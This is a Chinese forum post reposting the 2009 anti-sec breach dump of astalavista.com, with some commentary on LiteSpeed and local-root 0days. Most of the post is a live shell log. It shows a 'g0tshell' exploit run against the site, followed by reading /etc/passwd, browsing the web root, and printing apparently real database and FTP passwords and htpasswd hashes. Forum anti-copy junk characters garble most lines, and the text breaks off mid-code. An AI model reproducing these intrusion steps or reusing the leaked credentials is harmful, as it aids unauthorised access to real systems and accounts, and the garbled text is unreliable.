里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。2 B! }8 k3 B' T5 ~- _
5 E* r6 U5 G5 S4 m1 i
[root@front3 ~]# curl -I litespeedtech.com
5 m$ [2 l; n5 ~. Q' x1 uHTTP/1.1 200 OK% q' T: R) F- V. y9 E! u2 f9 R5 z
Date: Fri, 05 Jun 2009 22:54:51 GMT
- W( ~% W- B1 o6 ]Server: LiteSpeed% d+ Q' U) r8 M- ^
& r6 |0 ^, c) j8 d) j8 p另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
5 O% [/ T( F0 T1 I
) ~. m4 f( ]8 i2 s8 R7 r" I+ G! ?有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。4 \* v9 ]& j2 g/ e+ M) y# [
2 t' j* U) Q) F" X, n
" X y! z% S& J, U: e+ v/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
/ b8 U+ i2 N6 d7 ]3 {/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
7 y( V5 D9 K3 a2 v8 Z. Z2 e8 b/ r/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \( @1 p9 A6 S6 a
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /7 l; a+ Q8 Q: [% K5 G- ~
\/ \/ \/ \/ \/ \/ \/! C2 \0 u; {1 ]
The Hacking & Security Community
8 u7 S# ^# N8 b% N) @& u2 B[+] Founded in 1997 by a hacker computer enthusiast1 ?& |( E# ?# g3 M. C
[-] Exposed in 2009 by anti-sec group$ H. m0 t$ F9 K7 y" Z0 L! ^
7 Q% i4 R- h+ qFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:) D! [/ v( Q4 h, p
>> 03. Who’s behind the site?) E! s" x# t5 |. a
>>
: P0 r' n1 A2 Y( n8 U' d/ R5 ~9 \>> A team of security and IT professionals, and a countless number of contributors from all over the world.
; O& \/ e4 s! S: \ q! n2 V( w* A* Z5 \+ F
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?' s- i u! }' E w
>>0 V& b/ n- ^1 I8 {4 ?) _
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and: w ^* O$ ^; v( Z' S8 I
military institutions./ h9 C8 H! ]6 w+ H6 s' N
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.4 Q7 d0 Z. Z( o/ n w$ m
# I: I* z% J& h/ dWhy has Astalavista been targeted?7 k T+ ]' ?, k# C) T
; j$ L1 l4 }- u( v# N( Q4 M: z3 r d
Other than the fact that they are not doing any of this for the “community” but7 Y; d' w. ?* N8 s2 ?
for the money, they spread exploits for kids, claim to be a security community6 v) a7 G& P1 W$ r
(with no real sense of security on their own servers), and they charge you $6.66
* }5 k. K* k* v1 b. Dper months to access a dead forum with a directory filled with public releases5 s4 A. {: `. e, @ B1 Q9 J
and outdated / broken services., d7 g1 ]3 ^* @3 L- {
6 @6 W1 |' g& U7 H( mWe wanted to see how good that “team of security and IT professionals” really is." n' Q! s' I6 N% X; {# B
% o1 g" M9 g' j# P/ x9 R* rLet’s begin.: V( t; b0 G0 K0 h( M
/ K8 W% P0 |: T) `/ Z& h
anti-sec:~# ./g0tshell astalavista.com -p 80
7 N) c% v+ Q4 o u! ][+] Connecting to astalavista.com:80
! Z7 ]/ V2 l( n1 l b! P[+] Grabbing banner…
, W/ j# c' C7 h- GLiteSpeed# r. Y; [6 o1 m, |5 U
[+] Injecting shellcode…: f% A$ c' I4 Y" v1 [, |
[-] Wait for it
3 M3 K! m% ]) L5 U& e1 p; W% r/ j! N9 Y! D% U. y
[~] We g0tshell5 n- q/ O* g# @! i$ b, I0 c* l
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
! }8 x( e R* F8 P2 tID: uid=100(apache) gid=500(apache) groups=500(apache)# Y8 e9 P) E& ~3 m- E7 S
- n* m# [2 q1 H, |, v
sh-3.2$ cat /etc/passwd; C3 I. L5 \4 V1 ]! e
root:x:0:0:root:/root:/bin/bash
" S) _% q* c6 \+ ybin:x:1:1:bin:/bin:/sbin/nologin
; c; x+ K% S2 h# c t Qdaemon:x:2:2:daemon:/sbin:/sbin/nologin
! r6 m- Z. b4 Ladm:x:3:4:adm:/var/adm:/sbin/nologin% k+ ^7 {- g0 l8 Q
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
# c6 u0 g- p5 p/ B# K& y1 t: Async:x:5:0:sync:/sbin:/bin/sync
/ o- | X( v1 ?7 O: Gshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
( V2 r, N: k$ c$ q9 mhalt:x:7:0:halt:/sbin:/sbin/halt
2 F4 Z( T& A M! kmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
# ~/ Z1 q. w4 \ `8 m4 U7 onews:x:9:13:news:/etc/news:7 @. ?, {1 l4 ]/ F K7 z. N$ H
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
& I. l$ t8 b/ Q* Yoperator:x:11:0 perator:/root:/sbin/nologin
/ @% t4 M% m. y0 f% Bgames:x:12:100:games:/usr/games:/sbin/nologin! ?! |' N. X1 ^, j( l3 m: K
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
* J. b. m1 a; A; C' w& W( Gftp:x:14:50:FTP User:/var/ftp:/sbin/nologin! k6 H% S% L- B/ M
nobody:x:99:99:Nobody:/:/sbin/nologin
& q& ]: r- J1 B, ` Q2 d+ t% r& hrpm:x:37:37::/var/lib/rpm:/sbin/nologin
O1 G4 Q3 N5 Y! s$ ~$ M* }4 jdbus:x:81:81:System message bus:/:/sbin/nologin
' y! Y2 f j/ E! ~7 Y( y, }* @nscd:x:28:28:NSCD Daemon:/:/sbin/nologin) s3 G1 e: U# K
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin ?) Z9 [5 J9 w" Y% \. }
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin; W$ b3 s8 L0 }5 A- _7 w# {
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin/ h# Y' ]. t/ a, [; q& p/ \
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
, r; i8 G8 o r( C' M0 Irpc:x:32:32 ortmapper RPC user:/:/sbin/nologin& o. R" n3 Z6 k& c# g7 M' F
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
4 b3 X1 n- v6 j& Dnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
, O9 O( \+ _, g2 x6 gsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
( e2 f( ^" i X% Z* D4 rpcap:x:77:77::/var/arpwatch:/sbin/nologin5 v: E9 Y! U" n. G: _$ h3 ]$ d6 i
named:x:25:25:Named:/var/named:/sbin/nologin
0 H' {1 L& t$ @apache:x:100:500::/var/www:/bin/false
- d1 ]& d6 C% b" R& W( V- Y! [ `; ydiradmin:x:101:101::/usr/local/directadmin:/bin/bash
+ n B9 \( P# r8 p1 \# Gmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash+ q) }% Y1 @+ \. M& n! k) A; x
webapps:x:500:501::/var/www/html:/bin/bash0 L1 i6 m5 x$ P& u$ U7 e! @! } l
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
1 O5 t8 L- q+ n% P; _( Badmin:x:501:502::/home/admin:/bin/bash7 \' G5 p1 y1 Q# Z. T! W( y
jon:x:502:503::/home/jon:/bin/bash
+ W1 r5 F$ C& ?( gcom:x:503:504::/home/com:/bin/bash! r: R7 q( I, _* \; m9 k. D
ntp:x:38:38::/etc/ntp:/sbin/nologin2 T# D1 A. d6 G
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin- N! [5 C& R& m* C+ V* d6 I
astanet:x:504:505::/home/astanet:/bin/bash
* @/ ~; {6 d0 V7 c9 g! s3 V# r1 e7 C& Wavahi:x:70:70:Avahi daemon:/:/sbin/nologin
' d6 t6 C4 p) r& wavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
" s" w- k+ p" h5 K y: n9 d3 r1 M) n' d1 h9 n
sh-3.2$ cat /etc/hosts
: X; H$ `% B( J# Do not remove the following line, or various programs3 l. {% c3 V3 K' t3 {: `
# that require network functionality will fail.
. _0 o* L3 I+ c3 e2 F+ p127.0.0.1 localhost.localdomain localhost0 s2 l* R8 Z+ ]: W. p. J
::1 localhost6.localdomain6 localhost6$ e6 g1 r- M. u% S" {
80.74.154.172 asta1.astalavistaserver.com; Q" L# Z4 Z" V" S9 ^9 y5 Y3 x. N
' Z+ N& `7 R. [$ jsh-3.2$ pwd' A! _8 L% f5 m1 h
/home/com/public_html
7 C. w2 O' }# `6 j& \
1 S7 i4 o- @3 W, m# v% V1 ~sh-3.2$ ls -la
& f$ s1 D" U" @9 _total 18460
$ {, o- @% j% n/ R2 bdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
/ ]) ]/ K8 Y) K/ n: w. T5 i1 H8 ldrwx–x–x 11 com com 4096 Jun 25 2008 ..7 h. H+ k a0 T, A7 ?) q; b7 W s
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin8 p& n( u. x6 L# t0 z* g- c
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
' C- L* r* A" ^1 r7 y% }5 v5 xdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
) U7 I# A: x1 y% W! P6 \0 Fdrwxrwxrwx 2 com com 4096 May 19 00:50 config
: a7 ~3 q) C3 S# U: u; B$ O1 }: b2 ]+ Cdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core$ L6 O4 Q: p4 N- x A/ a
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
. g* ?( d b4 qdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing* E% G) C' d l
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo4 n8 v7 W/ N+ w; U: W8 g
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
# G3 R5 r; t# L) t8 E-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php5 W# ]4 l) ~& u W7 n$ o4 g
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
" C' J0 ]: E3 r5 } ?8 L' ?drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
. Q& a* J$ m5 f1 o-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
: V, Q5 V+ B' B/ ]- E0 Pdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
. I4 T0 P2 n9 n4 m; z-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
* m. T! M5 b7 W; @ v1 y C! F+ d-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak1 F4 F; r) E( i" ]/ d* @
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
8 g) U3 a" c3 v5 \* Q6 v3 tdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
; P. ?/ C, ~7 ]drwxrwxrwx 14 com com 4096 Feb 2 19:29 images6 a% }9 v( Y. r- @4 C
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
2 t9 g4 y; @1 j8 f! M5 X' Mdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer d% w/ z i* j$ h( Q
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
8 M8 P1 S6 s7 V( [$ Z9 d5 W! h# xdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
1 d, ]) I/ F9 j; ^! [) Q0 r. Idrwxrwxrwx 12 com com 4096 Jun 2 07:47 media; F/ i/ u% C2 b( I3 c" H
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
' e3 s9 r" }) Q) s( G( K. q7 [drwxr-xr-x 34 com com 4096 May 28 16:30 modules; q2 p& m& Z' U7 T$ ]' C* n3 T
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
4 Z2 k& R3 R" D; t# J% Udrwxrwxr-x 22 com com 4096 May 28 17:06 _new
+ j# i' |% S* y' y1 udrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
6 ?* I. h2 r. F8 ?9 Bdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
1 z5 x a6 ^* `2 ydrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
3 A) O8 i* V8 \. d# n! y6 h-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
# |# i4 h6 c# s: }) A$ B-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml h- a" `5 K+ I& x- A
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
3 `0 z. t5 n0 Q0 l! O1 Rdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes8 `( T1 ^6 m, f$ X' f% j% @* m
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
8 J! A4 i+ j8 t; Y9 o: ddrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam1 c I. p+ I+ R) P( \
* K+ u; t$ }" ~$ e7 L: a6 Hsh-3.2$ head -20 index.php
' p7 I) ~$ [( c& J% E3 b! ~<?php
3 p6 j9 Y# p5 D5 W2 g- D' U* A# a6 G8 P1 {1 O
/**
2 R- [) a/ e& I$ B2 H* The main page for the CMS
7 s$ b ]% ?/ k: S) W* @copyright CONTREXX CMS - COMVATION AG
8 i% x/ J0 z3 C: _( j* @author Comvation Development Team! E) j( ^% X/ U/ |
* @version v1.0.9.10.1 stable
1 @4 P4 I( `; R6 P( h$ F! \; H$ e* @package contrexx
* N! ^- M( q& h1 K6 ^% j4 r! |* @subpackage core
1 k q5 E+ }( U! o3 |7 m* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage' A* K9 T. h* i& y/ h3 r
* @since v0.0.0.0. J) ?7 j! P T
* @todo Capitalize all class names in project
7 x$ \ O; X: _" g |' M, s* @uses /config/configuration.php1 ]4 E! w# E7 k
* @uses /config/settings.php6 _- B" d/ T1 K a; B; o- P
* @uses /config/version.php @/ r7 I5 C. g) \+ s! C) G% }
* @uses /core/API.php
; P* J( U J% E5 j3 v9 L/ R3 w* @uses /core_modules/cache/index.class.php, W7 x' D2 j& q3 v- A$ g
* @uses /core/error.class.php0 } d; R% H) v1 y4 v# a
* @uses /core_modules/banner/index.class.php" o- x& L; v1 O J( a' E
* @uses /core_modules/contact/index.class.php
& n3 T2 Y% _& T+ h1 t S
6 Y; e+ i# Z8 R! Y+ N# g( Bsh-3.2$ cd config/
& y. p p4 C$ B7 J$ ?' o; Jsh-3.2$ ls -la
$ w1 _ M& V; c3 ztotal 322 z- C9 y/ f9 {; @8 ^4 y8 i3 Q
drwxrwxrwx 2 com com 4096 May 19 00:50 .+ `/ a" V* G7 C
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
& I; u: }) \* j# q4 \-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php* ^+ r9 h3 o- q# z( b, {
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php% @3 E" q' e8 z' {
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
' p/ h/ ^. G- @ a-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
5 o" `8 E% N' Q( E6 ]- _. H: O
1 n* \& Y9 V8 I! l! p: F+ v5 c/ R( e: ~sh-3.2$ cat configuration.php+ [% {% I; p) l+ C S& P, s) }$ Z
[snip]
% t3 U0 k, E! x$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost Y7 ^4 E& b/ N1 H$ B/ y3 j
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
) {, v1 C; Z/ \7 p8 f* ]3 y$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
- K$ I3 G! ?6 Q# ^$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
3 C! x/ w& y& F$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
# F; S1 I4 s) t$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
9 T4 t$ d5 b$ M/ j" g, _* c$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
: m2 `# D9 x1 K9 Y" d[snip]: x+ N' p9 i/ K& N5 n) E
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false/ H j) R3 a! F1 f
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode; t# I( _: i5 n( ]+ [) L
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
# g+ Q |' w% F4 |$_FTPCONFIG['port'] = 21; // Ftp remote port
- a1 M$ |. I; ?9 ~" g# h$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username0 e* \3 L- O- f; z
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password1 e$ J* b# `6 g+ J/ V% j% {
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
! i& @; U- f+ g6 A# }( x2 [( G
; [4 ^' |* Z0 z6 v7 g; U, {sh-3.2$ cd ..; M. h" K0 P8 m( V+ Q' h8 G
sh-3.2$ cd dvd/0 o0 k/ j# f/ p1 Z) m* J
sh-3.2$ ls -la
3 H: }5 I$ G' J' i2 B) A( ctotal 2913780
: e6 a5 u- ~9 {- G% ldrwxr-xr-x 2 com com 4096 Sep 9 2008 .
/ s& q( n. x/ y2 f6 C" {# Q9 m$ C2 h7 _drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
' u2 b/ e) Y0 a0 h0 j o-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar8 B# ?1 q0 G; P5 t
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
# w/ t* }' w6 P, O/ S-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
, r1 E0 b7 f9 z* U-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
4 o5 w3 s8 F, C. l& ?) |( D3 e) |# I- c4 V* J$ u
sh-3.2$ cat .htaccess
' N9 @$ C7 E+ e9 t8 H3 b! C3 KauthType Basic
( u& p6 T( `# O1 l( w1 kauthName DVD
' D3 L1 |8 `& Z3 c( K5 bauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
4 v" o2 y/ j6 D3 ^require valid-user
! ^+ T, {& l5 Y# x$ k3 N& c- q
& `* e3 M0 N' s0 |- [sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd* M/ n# ^4 M! q% o7 a! c
DVDdownload:CRD8cuY6.MPT6' n5 Q8 J, r1 |3 N# Z: e) j7 u" q
DVDdownload2:CR8a36.wluFMg3 e* w4 O1 {; o5 m
6 f) B/ \, q/ L
sh-3.2$ cat test.php4 Y8 l1 N0 T( m4 ^" T
<?php: U& H+ Q9 \( m7 a
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
1 ^5 ~* |* a* U3 l$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
8 N5 e8 s8 L0 {: fecho $url;
% T. s" `* g; `* o6 Z/ s5 \. l?>
8 u. N0 U8 g6 H. C
' s/ g* {! |0 X {5 @, hsh-3.2$ cd modifications/
8 `. g. p* t! O5 ^. I( U& x Ksh-3.2$ ls -la
5 f* D5 B C- |! N vtotal 32. L. b# k1 U m& L
drwxr-xr-x 8 com com 4096 May 11 12:48 .
( M$ ~, D0 G1 ?0 R$ a9 kdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..6 z3 e1 R0 m& |; L' D' M; t
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng* s% ~1 W$ z% j6 ]
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
/ t$ ]8 W# D9 L5 g9 X( Y" L* Sdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
% X# L+ O) l2 w& {5 k- M3 Wdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
% n4 d( A/ w; L v# W, C# |drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
/ f- m, C. m8 B. J( _! k _9 p& n# ?' |drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
" K* U, P" n" C3 h$ x2 d- N3 ]5 u& @1 _$ G# O/ r# L! Q7 z
sh-3.2$ ls -R
: v$ k0 }9 H) h7 }$ Q' k.:
6 Y" w4 ^* m% T) c$ g. h# x3 ocom_avtng cronjobs onlinetools pjirc search _tmp; l$ s2 r( o1 }: b I @
0 U" @. N5 C9 b! s./com_avtng:
4 e( J5 ]% }/ f, Q5 yavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts5 D' D$ b; C& |" \; b/ c. I
& @( p9 u R4 ^( w./com_avtng/scripts:
( _# F q7 N( ^1 `popunder.js
2 q7 Q+ S: {0 P* N
; r1 N: ?$ i' x9 v6 k0 g$ j9 z./cronjobs:
1 Z4 j# W/ @, o) D% \exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp, w4 u1 b) A$ y. n
+ W t' ^- ]0 D: l./cronjobs/tmp:
: m* b) N/ y. \+ ]contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv0 b. I+ d" B: b
! [3 A: Q+ s$ V3 i" S. M9 H7 ^% S
./onlinetools:) H- H+ [2 h b p$ B9 q0 p
index.php9 N6 W" b, z9 D0 q6 G, P3 I
- \; `9 {. _- T# ~/ b' Y
./pjirc:
0 ], ^, m6 i! f8 J6 wa_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt; Q. c. x' _7 A
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt7 G W- I c2 T8 V! p- H' X8 z
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
5 C5 W7 u) y0 u. F# ?' `2 i
9 B1 |" a/ `) u7 ~./pjirc/img:4 c1 ?0 Y5 y2 N
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
1 N" }2 e: ]! q2 F/ x; Narbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 8 o4 \$ o3 @( k& l( `/ A
verre-eau.gif! a( ^4 a1 C4 K) }+ w: W* h
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 9 {; z5 \6 K# s/ r% H
verre-vin.gif
2 {! ^, \, H8 y9 i$ u* z! |ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif% R) V+ M$ e" ~7 H+ L, L0 X
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
* T; c/ N- t' a: ?
. c. n% e! P* l+ F7 ?2 ]./pjirc/snd:, H; h j* U; Z0 B' \8 C
bell2.au ding.au8 g( z6 d9 x t* k
* Q0 K7 W& H, G' O9 Z./search:* e0 T0 i9 ]* H7 `
searchEngines.php search.php
. R+ w" X2 ?2 e4 E
5 j( S! z2 Y. ~! c6 B. F b! d0 P# L./_tmp:
8 ]8 S. t# Z( _* @* L N* u2 tdefaultPorts.php defaultPorts.txt. F* P9 P3 s j2 L3 n9 w
* S* o; P2 d2 _9 g$ d4 u2 \# \5 a
sh-3.2$ cd cronjobs/
. F% _7 c* }% I- v. v. k$ F8 Jsh-3.2$ cat exploits.php
. Y- m( I" I% f( A3 x4 f+ Y[snip]
1 D( E) h% g( f, v$categories = array();
5 Z) s5 I8 P4 l' V$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;9 i9 `+ F* ` m/ U
$expolits = file($milw0rmFile);
* G' L7 _$ R8 m9 R+ H i0 ~$comExploits = array();5 n, d* H* j7 U: Q) u& T z/ h. z# i
[snip], Z; Z1 V8 a6 o# {3 n
// manage data
( T! f1 M2 b4 w6 Mfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640/ I% Q/ Z1 a1 ^, u- o0 y: i
$ K3 c3 i/ M, L* G // get path and title
& A) j" b- j* [8 f/ s; d* {0 Y $expolits[$x] = trim($expolits[$x]);
' R# F; q$ h J/ w# D* k $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
/ b( R j2 v! A0 [* U( C3 f$ [ $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
5 u. ?- v! O( J" S6 S' n2 R" s/ H
) p: ~# A% x0 L' ]5 m // check if file exists
+ q- t% L5 p8 {: e% R2 Q if (file_exists($path)) {
7 W; q' }9 d- a, s: E' B4 u) U8 o3 l9 I2 x
$text = file_get_contents($path);
" Z* c$ i! L$ Z5 x2 v+ k% ^! G5 i h; s0 V
// get content and date, @1 V1 A. G( x9 Y" p. }
//$text = htmlspecialchars($text, ENT_QUOTES);
0 y2 r/ j& r. \ $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
/ p) l" L; v7 V6 `" Y g if ($tmptext != ”) {
- ?- u4 u1 L+ J) E $text = $tmptext;
% I3 W8 s' f7 V# }: r' t& ^7 s } else { D& @ ]6 D* y" b& a' ]6 e
$text = addslashes(htmlentities($text, ENT_QUOTES));8 V+ W1 r+ o \, T" f9 V; A
}
* j) c( |2 t: j7 p D: E. X, D $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
4 r, w# s# x( E1 G# ^# x! W- c $tmp = explode('-', $date);# Z3 Q6 m% i" l% y& d
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
6 H3 ]/ j- J; ~5 Z& v5 |" _0 { $cat = getCategory ($path); |* v4 g1 f& z, x) m- D9 x
$ext = pathinfo(basename($path));1 f7 y( d$ L; [2 a
$ext = $ext['extension'];- s$ T4 {1 u. [% x3 O2 c/ w! T- A
$qStr = ”
3 E6 A. R/ @6 t! ]& u! X8 x- T SELECT `id`3 }5 Z+ O8 ~- _# @" ]/ C
FROM `contrexx_module_exploits`
, c6 w3 y$ p/ S8 e0 g9 J WHERE `title` = ‘” . $title . “‘
) p! X A" y$ @! c% A( @2 X- e AND `date` = ‘” . $date . “‘+ u- z# X) N* X& v- [; f- y
“;
- I/ w7 x- k# N( f) {! ` echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
9 [0 ^& V' N& ?5 p& d# v2 ` $q = $_objDB->query($qStr);
9 [; t7 j* A; G! b4 p+ `+ J/ P: h
if ($q->numRows() == 0) {
/ v0 u3 Z* D: g2 y4 W& R( ?/ U2 S7 O1 W) E
// prepare array
l( ~7 ~9 e0 @; W% u5 k9 J $comExploits[$x]['date'] = $date;5 Z0 h( g+ r/ U4 s0 b3 B
$comExploits[$x]['title'] = $title;
* X% l/ J3 G" x) s1 P1 _2 ?/ \ $comExploits[$x]['author'] = ‘milw0rm’;
( f1 V9 X8 t3 A d $comExploits[$x]['text'] = $text;
7 W+ X1 k, ]# I' ^ $comExploits[$x]['source'] = $ext;
! X7 E2 S8 q' r. y $comExploits[$x]['url1'] = ”;
' { z0 \9 b- u $comExploits[$x]['url2'] = ”;+ D' d% G7 P, g! f$ Z1 s4 K
$comExploits[$x]['catid'] = $cat;0 K$ _- k) D5 Y9 f% ^
$comExploits[$x]['lang'] = ‘2′;
1 O) ?* j$ n0 ?$ q $comExploits[$x]['userid'] = ‘12′;
( h$ \9 @. h4 G' H" d1 x; _8 j $comExploits[$x]['startdate'] = ‘0000-00-00′;+ y# {& J8 i/ v: O" z6 t9 M
$comExploits[$x]['enddate'] = ‘0000-00-00′;: `9 [# D3 ^8 B5 |6 G( y
$comExploits[$x]['status'] = ‘1′;! D& M H! }1 G! M, m
$comExploits[$x]['changelog'] = $date;: f0 I3 e2 X8 W
# l% F' W: r9 k: f* C
}
* n4 q2 v) p+ u+ X% d4 ?[snip]
U, @3 i- ^2 h2 Q $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
9 Z( I9 A: {% r<rss version=”2.0″>; H+ X) ~- G% x' z9 o% \
<channel>
